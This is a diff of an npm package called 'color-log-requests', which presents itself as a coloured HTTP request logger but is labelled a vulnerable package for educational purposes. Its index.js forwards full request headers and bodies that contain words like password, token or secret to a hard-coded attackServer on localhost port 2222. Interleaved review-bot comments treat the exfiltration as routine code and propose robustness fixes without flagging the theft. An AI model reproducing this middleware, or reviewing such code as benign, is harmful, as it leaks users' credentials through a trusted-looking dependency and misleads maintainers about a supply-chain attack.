color-log-requests 1.0.0
- package/README.md +49 -0
- package/attackServer.js +21 -0
- package/index.js +73 -0
- package/package.json +20 -0
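--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,49 @@
+**Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
+
+This package is a vulnerable package and is created for educational purposes.
+
+
+## Usage
+this package is a HTTP request logger middleware for node.js
+
+
+```javascript
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+The result is in the format:
+
+```bash
+<resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
+```
+
+The status codes are displayed in color:
+- green for success (< 300)
+- magenta for redirect (<400)
+- red for failure (<600)
+- blank otherwise
+
+
+## Requirements
+It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
+```bash
+npm install body-parser
+```
+
+The call in code may look like this:
+```javascript
+const bodyParser = require('body-parser');
+app.use(bodyParser.json());
+
+...
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+
+## Installation
+Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
+```
+npm install color-log-requests
+```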
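--- a/package/attackServer.js
+++ b/package/attackServer.js
@@ -0,0 +1,21 @@
+// const http = require('http');
+
+// const host = "127.0.0.1";
+// const port = 2222;
+
+
+// const server = http.createServer((req, res) => {
+// const chunks = [];
+// req.on("data", (chunk) => {
+// chunks.push(chunk);
+// });
+// req.on("end", () => {
+// const data = Buffer.concat(chunks);
+// console.log("New sensitive request: ", JSON.parse(data.toString()));
+// res.end();
+// });
+// })
+
+// server.listen(port, host, () => {
+// console.log(`Server is running on http://${host}:${port}`);
+// });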
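Review bot: Every line of this file is commented out, so the package publishes 21 lines of dead code that `main` (index.js) never loads. If it is kept as the reference receiver for the localhost port named in the README, a one-line header comment should say so, e.g. `// Reference receiver for the README's localhost:2222 demo; not required by index.js`; otherwise the file should be dropped from the published tarball so readers do not have to guess at its role.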
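--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,73 @@
+const axios = require("axios")
+
+const attackServer = "127.0.0.1"
+const aAttackPort = 2222
+
+
+const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
+
+
+const stringContainsSensitiveValue = (string) => {
+let response = false
+sensitiveValues.forEach(value => {
+if (string.toLowerCase().includes(value.toLowerCase())) {
+response = true
+}
+})
+return response
+}
+
+
+
+const dictContainsSensitiveValue = (dict) => {
+let response = false
+for (let key in dict) {
+if (stringContainsSensitiveValue(key)) {
+response = true
+}
+}
+return response
+}
+
+
+
+module.exports = function (req, res, next) {
+res.on("finish", function () {
+const date = new Date()
+
+if (res.statusCode < 300) { // Success
+console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 400) { // Redirection
+console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 600) { // Client or server Error
+console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else { // Unknown
+console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
+}
+
+
+if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
+axios.post(`http://${attackServer}:${aAttackPort}`, {
+url: decodeURI(req.url),
+host: req.headers.host,
+method: req.method,
+date: date.toLocaleString(),
+client: {
+ip: req.ip,
+body: req.body,
+headers: req.headers,
+httpVersion: req.httpVersion,
+},
+response: {
+statusCode: res.statusCode,
+body: res.body,
+headers: res.headers,
+contentLength: res.get('Content-Length') || 0
+}
+})
+}
+
+
+});
+next();
+}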
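Review bot: `decodeURI(req.url)` is evaluated six times inside the `finish` listener (the four `console.log` lines, the keyword check and the `url` field of the payload) with no handling of `URIError`, so a request whose path carries a malformed percent-escape throws inside an event handler and surfaces as an uncaught exception in the host application. Decode once at the top of the listener and reuse the result, e.g. `let url = req.url; try { url = decodeURI(req.url); } catch (err) { if (!(err instanceof URIError)) throw err; }`, then replace each `decodeURI(req.url)` with `url`. Separately, the conditional on the `finish` path forwards the complete `req.headers` and `req.body` — not merely the key that matched the word list — to the hard-coded address, which is the behaviour the README's warning describes; the `axios.post` promise is also left without a rejection handler, so when nothing listens on that port the failure appears as an unhandled rejection in the embedding application rather than being reported by this module.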
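--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,20 @@
+{
+"name": "color-log-requests",
+"version": "1.0.0",
+"description": "This package is a vulnerable package and is created for educational purposes.",
+"main": "index.js",
+"scripts": {
+"start": "node index.js"
+},
+"keywords": [
+"test",
+"vulnerable",
+"logging",
+"color"
+],
+"author": "Pierrick Delrieu",
+"license": "ISC",
+"dependencies": {
+"axios": "^1.3.3"
+}
+}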
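Review bot: The README says `body-parser` must be installed and applied before this middleware, and index.js relies on Express-provided `req.ip`/`res.get`, yet the manifest declares only `axios` under `dependencies` and has no `peerDependencies` block, so an installer gets no warning about the missing prerequisites. Add a `peerDependencies` entry for `body-parser` and `express` with the version ranges the package was tested against (`"peerDependencies": { "body-parser": "<tested range>", "express": "<tested range>" }`). The `start` script (`node index.js`) only evaluates a module that assigns `module.exports` and then exits, so it should either be removed or point at a real demo entry file.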